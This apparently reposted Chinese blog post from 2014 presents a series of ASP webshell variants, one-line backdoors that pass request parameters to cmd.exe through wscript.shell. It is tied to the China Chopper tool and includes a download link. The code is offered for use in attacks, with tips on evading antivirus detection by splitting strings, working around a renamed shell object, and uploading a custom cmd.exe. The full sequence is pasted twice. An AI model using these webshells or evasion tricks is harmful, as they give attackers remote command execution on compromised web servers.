关于asp、php,jps一句话木马--中国菜刀使用
2014-12-15 00:19
375 查看
工具下载地址:http://pan.baidu.com/s/1o6jxAgq这里的asp后门不指像那些一句话木马、砍客、冰狐、明小子之类的b/s型的,只指像cmd.asp或2005a.asp的。
第一个,来看zzzeva免fso的cmd.asp
代码如下:<form method="post">
<input type=text name="cmd" size=60>
<input type=submit value="run"></form>
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request.form("cmd")).stdout.readall%>
</textarea>
是不是觉得有点长了?在黑客注入时写有点不好写。那来改一下。
第二个,更改zzzeva免fso的cmd.asp
代码如下:
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request("cmd")).stdout.readall%>
用法是xx.asp?cmd=net user
这样是为了得到结果排得方便,其实如果不为美观,还可以更短,那来第三个
第三个,缩短的cmd.asp
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request("cmd")).stdout.readall%>
这里用了response.write,变量用了cmd。为什么不更短呢?
第四个,更短的cmd.asp
<%=server.createobject("wscript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>
好像这就是最短的了。除了短,我们还要在别的地方下功夫。
第五个,wscript.shell被改名怎么办?
代码:
<ObjEct runat=sErvEr iD=kk scOpE=pagE
classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>
<%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>
当然,classid值在不同系统下有所不同。这个要自行更改
第六个,被一些杀asp木马的软件检测出来怎么办?
把变量拆开呀。代码:
<%=server.createobject("ws"+"cript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>
或
<%=server.createobject("ws"&"cript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>
这里代码引号里的东东都可以随便拆的,像还可以拆成
<%=server.createobject("ws"&"cript.shell").exec("c"&"md.exe /c
"&request("c")).stdout.readall%>
第7个,cmd.exe不让调用怎么办?
这个你自己上传一个cmd.exe,放在一个可以调用的目录下,代码更改如下:
<%=server.createobject("wscript.shell").exec("e:\aspx\cmD.EXE /c
"&request("c")).stdout.readall%>
第一个,来看zzzeva免fso的cmd.asp
代码如下:<form method="post">
<input type=text name="cmd" size=60>
<input type=submit value="run"></form>
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request.form("cmd")).stdout.readall%>
</textarea>
是不是觉得有点长了?在黑客注入时写有点不好写。那来改一下。
第二个,更改zzzeva免fso的cmd.asp
代码如下:
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request("cmd")).stdout.readall%>
用法是xx.asp?cmd=net user
这样是为了得到结果排得方便,其实如果不为美观,还可以更短,那来第三个
第三个,缩短的cmd.asp
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request("cmd")).stdout.readall%>
这里用了response.write,变量用了cmd。为什么不更短呢?
第四个,更短的cmd.asp
<%=server.createobject("wscript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>
好像这就是最短的了。除了短,我们还要在别的地方下功夫。
第五个,wscript.shell被改名怎么办?
代码:
<ObjEct runat=sErvEr iD=kk scOpE=pagE
classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>
<%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>
当然,classid值在不同系统下有所不同。这个要自行更改
第六个,被一些杀asp木马的软件检测出来怎么办?
把变量拆开呀。代码:
<%=server.createobject("ws"+"cript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>
或
<%=server.createobject("ws"&"cript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>
这里代码引号里的东东都可以随便拆的,像还可以拆成
<%=server.createobject("ws"&"cript.shell").exec("c"&"md.exe /c
"&request("c")).stdout.readall%>
第7个,cmd.exe不让调用怎么办?
这个你自己上传一个cmd.exe,放在一个可以调用的目录下,代码更改如下:
<%=server.createobject("wscript.shell").exec("e:\aspx\cmD.EXE /c
"&request("c")).stdout.readall%>
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- PHP一句话木马,中国菜刀
- 关于高清在线播放器:[迅播播放器][可使用javascript调用][完全兼容asp,jsp,php,.net等主流语言编写的程序]
- PHP一句话木马,中国菜刀
- 关于SQL Server 2005 与 Asp.net 2.0 中的 SQLCacheDependency 的使用
- 关于使用asp.net调试器出现的问题及相关解决方法
- 关于在asp.net中使用showDialogModal方式输入数据中存在的问题
- 关于Flex、Tomcat、Jrun、ColdFusion、IIS、ASP.Net结合使用的误区!
- 使用ASP.NET中的一点体会--关于代码分离[原创]
- 在PHP中使用ASP.NET AJAX
- 关于ASP 文件类的使用
- 关于Asp.net中使用以下代码导出Excel表格的问题
- 在不同语言中关于CheckBox的处理办法(ASP、JSP、PHP)
- 关于“使用客户端行为来丰富 ASP.NET 的 DataGrid”的bugs
- 在jsp、asp和php网站网页中使用xhtml
- 新人求助关于PHP的转换成ASP
- 关于ASP.NET中使用ViewState的心得。
- 关于ASP.NET中OCX控件的使用
- 关于PHP与Sybase数据库的连接与使用
- [导入]关于在ASP.NET中使用MD5加密的方法
- FAQ:关于aspspider.net的申请与使用(逐渐整理中)